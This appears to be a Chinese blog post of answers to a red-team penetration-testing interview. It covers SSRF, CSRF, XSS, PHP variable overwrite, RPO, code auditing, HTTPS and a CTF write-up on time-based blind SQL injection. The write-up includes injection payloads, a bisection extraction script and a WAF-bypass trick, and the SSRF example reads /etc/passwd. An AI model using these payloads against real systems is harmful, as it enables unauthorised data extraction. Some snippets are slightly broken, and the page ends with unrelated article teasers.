2025年滲透測試面試題總結-2025年HW(護網面試) 70(題目+回答)

安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

?2025年HW(護網面試) 70

一、自我介紹

二、同源策略 & 三大漏洞對比解析

1. 同源策略(SOP)核心規則

2. 三大漏洞攻防對比

三、反射型XSS vs DOM型XSS

四、變量覆蓋漏洞高危函數(PHP示例)

五、RPO(Relative Path Overwrite)漏洞精解

攻擊原理

實戰場景

六、CTF經典題型解析:Web時間盲注

七、代碼審計核心方法論

八、CSRF防御三重機制

九、數據分析實戰經驗

十、HTTPS工作原理詳解

?2025年HW(護網面試) 70

1、自我介紹
2、講一講同源策略/SSRF/CSRF/XSS
3、反射型XSS和DOM型XSS的區別
4、變量覆蓋漏洞涉及的主要函數
5、對RPO漏洞的理解
6、講一道印象深刻的CTF題
7、講一講代碼[審計]()的思路
8、講一講csrf如何防御
9、有沒有做過[數據分析]()
10、https的工作原理

一、自我介紹

網絡安全高級工程師 | 5年攻防實戰經驗

  • 核心領域:Web漏洞挖掘(主導審計50+系統)、SDL建設、紅藍對抗
  • 技術標簽:PHP/JAVA代碼審計、自動化滲透工具開發、CVE-2024-*** 發現者
  • 當前關注:AI賦能漏洞挖掘、云原生安全加固

二、同源策略 & 三大漏洞對比解析

1. 同源策略(SOP)核心規則
markdown| 對比項 | 同源判定條件 | 受限操作 | |--------------|----------------------------------|--------------------------| | 協議/域名/端口 | 三者完全一致 | Cookie/Storage訪問 | | 跨域限制 | 阻止讀取跨域資源 | AJAX請求、DOM操作 | | 例外機制 | CORS/JSONP/postMessage | 需顯式授權 |
2. 三大漏洞攻防對比
漏洞類型攻擊原理防御方案典型案例
SSRF偽造服務端請求內部系統(如file:///etc/passwd白名單校驗、禁用危險協議、網絡隔離云服務器元數據API泄露
CSRF誘導用戶點擊惡意鏈接觸發身份操作Anti-CSRF Token、SameSite=Strict銀行轉賬篡改請求
XSS注入惡意腳本到頁面執行CSP策略、輸入輸出編碼、DOM Purify存儲型XSS竊取用戶Cookie

💡 關聯風險:XSS可繞過SOP獲取頁面數據,SSRF可突破網絡邊界訪問內網。


三、反射型XSS vs DOM型XSS

mermaidgraph LR A[觸發方式] --> B[反射型XSS:惡意參數通過URL傳遞,服務端返回含攻擊代碼的頁面] A --> C[DOM型XSS:前端JS直接操作DOM樹注入代碼,不經過服務端] D[檢測重點] --> E[反射型:URL參數、HTTP頭輸出點] D --> F[DOM型:location.hash/document.write 等函數] G[防御差異] --> H[反射型:服務端輸出編碼] G --> I[DOM型:前端安全API(如textContent替代innerHTML)]

四、變量覆蓋漏洞高危函數(PHP示例)

四大危險函數及場景

  1. extract()
    phpextract($_GET); // 直接覆蓋已有變量$auth if ($auth) { admin(); } 
  2. parse_str()
    phpparse_str($input); // 輸入"auth=1"覆蓋變量 
  3. $$動態變量php
  4. foreach($_GET as $key => $val) { $$key = $val; // 輸入?userid=admin覆蓋權限 }
  5. mb_parse_str()
    phpmb_parse_str($_POST['data']); // 多字節版本同樣危險 

🔥 加固方案:禁用register_globals、嚴格聲明變量作用域、使用$_REQUEST白名單過濾。


五、RPO(Relative Path Overwrite)漏洞精解

攻擊原理
markdown1. 利用瀏覽器解析CSS相對路徑的差異: - 請求 `/page.php/ 惡意路徑?param=../../evil.css` 2. 服務器返回 `/page.php` 內容但URL路徑被篡改 3. 瀏覽器按篡改后的路徑加載CSS,將頁面內容當作CSS解析 4. 惡意CSS中注入JS代碼:`[color=red]{ background: url('javascript:alert(1)') }` 
實戰場景
  • 篡改靜態資源路徑實現XSS
  • 竊取頁面敏感文本(CSS選擇器匹配敏感元素)
    修復方案:使用絕對路徑引用資源、設置X-Content-Type-Options: nosniff

六、CTF經典題型解析:Web時間盲注

賽題:D^3CTF 2024 - SQL Time Maze
解題步驟

  1. 探測注入點
    sqlid=1' AND IF(ASCII(SUBSTR(database(),1,1))>100, SLEEP(2), 0)-- 
  2. 二分法自動化腳本
    pythonimport requests for i in range(1,50): low, high = 32, 128 while low <= high: mid = (low+high)//2 payload = f"IF(ASCII(SUBSTR((SELECT flag FROM secret LIMIT 1),{i},1))>{mid}, SLEEP(2),0)" start = time.time() requests.get(f"/query?id=1' AND {payload}-- ") if time.time()-start > 2: low = mid+1 else: high = mid-1 flag += chr(low)
  3. 關鍵技巧
    • 繞過WAF:/*!50000SLEEP(2)*/
    • 加速:并發請求+位運算判斷

七、代碼審計核心方法論

五步深度審計流程

  1. 入口定位
    • 路由解析(如Spring MVC的@RequestMapping
    • 配置文件(web.xml/config.php
  2. 危險函數追蹤
    markdown| 漏洞類型 | 關鍵函數/API | |------------|----------------------------------| | RCE | eval()/Runtime.exec() | | 文件操作 | FileInputStream()/copy() | | 反序列化 | readObject()/unserialize() |
  3. 數據流分析
    • 污點傳播:用戶輸入 → 過濾函數 → 危險函數
  4. 逆向回溯
    • sink點(如SQL執行函數)回溯至source(如$_GET
  5. 工具鏈整合
    • 靜態:Semgrep(自定義規則)、Fortify
    • 動態:Xdebug + 參數篡改測試

八、CSRF防御三重機制

防御層技術方案適用場景
令牌驗證服務端生成隨機Token綁定Session關鍵操作(支付/改密)
同源檢測校驗Origin/Referer簡單請求快速攔截
瀏覽器機制Cookie設置SameSite=Strict現代瀏覽器自動防御

?? Token設計要點:一次性使用、綁定用戶會話、加密存儲。


九、數據分析實戰經驗

安全大數據分析平臺建設

  • 數據源
    • 30TB/日日志(WAF/NIDS/業務系統)
    • 威脅情報(微步/ALPHA)
  • 技術棧
    mermaigraph LR A[Flink實時流] --> B[攻擊行為聚類] C[ElasticSearch] --> D[日志檢索] E[Spark ML] --> F[異常流量檢測]
  • 產出成果
    • APT攻擊溯源:挖礦木馬傳播路徑還原
    • 0day預警:異常SQL請求模式捕獲Log4j2漏洞利用

十、HTTPS工作原理詳解

雙向安全通信流程

mermaidsequenceDiagram Client->>Server: ClientHello (TLS版本+加密套件列表) Server->>Client: ServerHello (選定套件) + 證書 Client->>Client: 驗證證書鏈有效性 Client->>Server: 生成Pre-master密鑰(用證書公鑰加密) Server->>Server: 私鑰解密獲得Pre-master Note over Client,Server: 雙方基于Pre-master生成會話密鑰 Client->>Server: 加密傳輸應用數據(AES-GCM)

關鍵安全機制

  1. 證書信任鏈:CA機構根證書 → 中間證書 → 域名證書
  2. 密鑰交換:ECDHE算法(前向保密)
  3. 防篡改:HMAC簽名校驗
  4. 抗重放:隨機數+時間戳

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/916398.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/916398.shtml
英文地址,請注明出處:http://en.pswp.cn/news/916398.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

加權卡爾曼濾波

加權卡爾曼濾波融合&#xff0c;它通過給不同傳感器或估計結果分配不同的權重&#xff0c;來提高狀態估計的精度和可靠性。一、卡爾曼濾波1.狀態方程2.觀測方程其中&#xff1a;基本方程①狀態一步預測②狀態估計③濾波增益④一步預測均方差⑤估計均方誤差二、加權卡爾曼濾波對…

【世紀龍科技】新能源汽車維護與故障診斷-汽車專業數字課程資源

在職業院校汽車專業教學中&#xff0c;理論與實踐脫節、設備投入不足、學生實操能力薄弱等問題長期存在。如何讓學生在有限的教學資源下掌握新能源汽車核心技術&#xff1f;如何讓教師更高效地開展理實一體化教學&#xff1f;《新能源汽車維護與故障診斷》數字課程資源&#xf…

Windows Server系統安裝JDK,一直卡在“應用程序正在為首次使用作準備,請稍候”

一、背景 第二次遇到這個問題了&#xff0c;但是居然沒想起來之前遇到過&#xff0c;又問元寶給的答案不對&#xff0c;還沒想起來之前收藏過解決方案&#xff0c;這里特別記錄一下。 二、問題描述 操作系統是Windows Sever2019&#xff0c;安裝JDK時卡住一直過不去&#xff0…

機器學習入門:線性回歸詳解與實戰

線性回歸&#xff08;Linear Regression&#xff09;是機器學習中最基礎也最常用的算法之一&#xff0c;無論是初學者入門還是實際業務場景&#xff0c;都能看到它的身影。本文將從概念、原理到代碼實現&#xff0c;帶你全方位了解線性回歸。一、什么是線性回歸&#xff1f;簡單…

第3篇:軟鏈接 mklink /D 教程:輕量緩存目錄遷移利器

我們通過諸多實踐后將三種鏈接方案分別獨立成篇&#xff0c;可以讓不同需求場景的讀者精準獲取所需內容。下面是回顧我們文章系列策劃的三篇博客標題、定位和詳細大綱&#xff0c;每篇都圍繞一個核心方案展開&#xff0c;具備教學性、實用性和實操性&#xff1a; &#x1f4d8;…

力扣 hot100 Day52

124. 二叉樹中的最大路徑和 二叉樹中的 路徑 被定義為一條節點序列&#xff0c;序列中每對相鄰節點之間都存在一條邊。同一個節點在一條路徑序列中 至多出現一次 。該路徑 至少包含一個 節點&#xff0c;且不一定經過根節點。 路徑和 是路徑中各節點值的總和。 給你一個二叉…

數據存儲:OLAP vs OLTP

下面系統性地進行介紹,包括OLAP數據庫的基本概念、特點、常見產品,以及它們在實際工作中的典型應用場景,最后對比與關系型數據庫(OLTP)的區別。 一、OLAP數據庫是什么? OLAP(Online Analytical Processing,聯機分析處理)數據庫,主要用于大數據量、多維度、復雜查詢與…

云原生網絡策略自動化在微服務架構 API 安全防護與流量管理中的應用

云原生網絡策略自動化在微服務架構中的核心價值隨著微服務架構在金融、電商等領域的廣泛應用&#xff0c;API安全防護與流量管理已成為企業數字化轉型的關鍵挑戰。Gartner 2023年報告顯示&#xff0c;83%的分布式系統因網絡策略缺失導致安全事件&#xff0c;而傳統靜態策略配置…

無需云服務器的內網穿透方案 -- cloudflare tunnel

內網穿透 原文地址 https://docs.caolib.dpdns.org/network/cloudflare tunnel.html Cloudflare Tunnel 內網穿透工具 1.簡介 1.1 介紹 官方介紹&#xff1a;Cloudflare Tunnel 為您提供了一種安全的方式&#xff0c;無需公開路由的 IP 地址即可將資源連接到 Cloudflare。使用…

目前市面上arm64-v8a、armeabi-v7a設備的市占率有多少?為什么x86架構的手機越來越少?

deepseek回答&#xff1a; 當前全球范圍內&#xff0c;arm64-v8a 架構在安卓設備中的市占率已超過 64%&#xff0c;遠超其他架構版本。具體分布如下&#xff1a; &#x1f4ca; 各架構市場份額對比 架構類型市占率定位與趨勢arm64-v8a≥64%主流 64 位架構&#xff0c;性能最…

Java中配置兩個r2db連接不同的數據庫

Java中配置兩個r2db連接不同的數據庫在實際項目中不可避免的存在使用兩個數據庫的情況&#xff0c;下面將系統地講解相關配置方案&#xff0c;包含配置文件、數據庫配置類、注解原理、常見錯誤排查等維度&#x1f9e9; 一、配置文件說明&#xff08;application.yml&#xff09…

Swagger 配置及使用指南

Spring Boot 項目集成 Swagger 配置及使用指南 一、Swagger 簡介 Swagger 是一個用于設計、構建、文檔化和使用 RESTful API 的框架。通過集成 Swagger&#xff0c;開發者可以&#xff1a; 自動生成實時 API 文檔直接在瀏覽器中測試 API 接口減少手動編寫文檔的工作量支持團隊協…

什么是緩存雪崩?緩存擊穿?緩存穿透?分別如何解決?什么是緩存預熱?

緩存雪崩&#xff1a;在一個時間段內&#xff0c;有大量的key過期&#xff0c;或者Redis服務宕機&#xff0c;導致大量的請求到達數據庫,帶來巨大壓力- 給key設置不同的TTL、利用Redis集群提高服務的高可用性、添加多級緩存、添加降級流策略緩存擊穿&#xff1a;給某一個key設置…

圖像預處理 二

目錄 1. 插值方法 1.1 最近鄰插值 1.2 雙線性插值 1.3 像素區域插值 1.4 雙三次插值 1.5 Lanczos插值 1.6 小結 2. 圖像掩膜 2.1 制作掩膜 2.2 與運算 2.3 顏色替換 2.3.1 制作掩膜 2.3.2 顏色替換 2.4 圖像掩膜代碼 3. 圖像添加水印 3.1 模板輸入 3.2 與運算 3…

1.Java發展簡史與設計哲學

目錄引言一、生活里到處都是 Java1.1 Java 在生活中的小例子1.2 Java 的核心應用場景二、Java 是咋誕生的&#xff0c;又有啥核心設計思想2.1 Java 的發展歷程2.2 Java 的三大設計哲學2.3 Java 哲學給行業帶來的變革三、為啥大家都選 Java 呢3.1 和其他主流編程語言對比的優勢3…

基于粒子群算法優化高斯過程回歸(PSO-GPR)的多輸出回歸

基于粒子群算法優化高斯過程回歸(PSO-GPR)的多輸出回歸 使用粒子群優化算法(PSO)優化高斯過程回歸(GPR)模型,解決多輸入多輸出(MIMO)回歸問題。該模型能夠同時預測多個相關輸出變量。 %% 基于粒子群算法優化高斯過程回歸(PSO-GPR)的多輸出回歸 % 作者: MATLAB技術助手 % 日期…

學Simulink——AC-DC整流器場景:基于PWM整流器拓撲結構的建模:三相電壓型PWM整流器(SR)單位功率因數控制仿真

目錄 手把手教你學Simulink——AC-DC整流器場景:基于PWM整流器拓撲結構的建模:三相電壓型PWM整流器(SR)單位功率因數控制仿真 一、背景介紹 二、系統結構設計 三、建模過程詳解 第一步:創建新Simulink項目 第二步:添加主要模塊 1. 三相交流電源 2. PWM整流器電路 …

深度解析 noisereduce:開源音頻降噪庫實踐

項目簡介 noisereduce 是一個基于 Python 的開源音頻降噪庫,專注于為科研、工程和日常應用提供簡單高效的噪聲抑制工具。該項目由 Tim Sainburg 維護,核心算法基于頻譜減法(Spectral Gating),無需深度學習或復雜訓練,適合快速集成到音頻處理、語音識別、播客后期、科學實…

lottie 動畫使用

lottie 官網&#xff1a; https://app.lottiefiles.comhttps://app.lottiefiles.com 選擇動畫 未下載過 已下載過 點擊download 保存到自己的工作空間后&#xff0c;可獲取lottie文件 使用vue 點擊后獲取代碼 第一步&#xff0c;項目中加載模塊 npm install lottiefiles/do…

Java,八股,cv,算法——雙非研0四修之路day16

目錄 昨日總結 今日計劃 算法——兩個數組的交集 算法——兩數之和 緩存穿透 常見解決方案 緩存雪崩 常見解決方案 緩存擊穿 常見解決方案 棧溢出 堆溢出 功能接口式參數&泛型函數 ?編輯 昨日總結 緩存問題完結&#xff08;緩存穿透、雪崩、擊穿&#xff09;…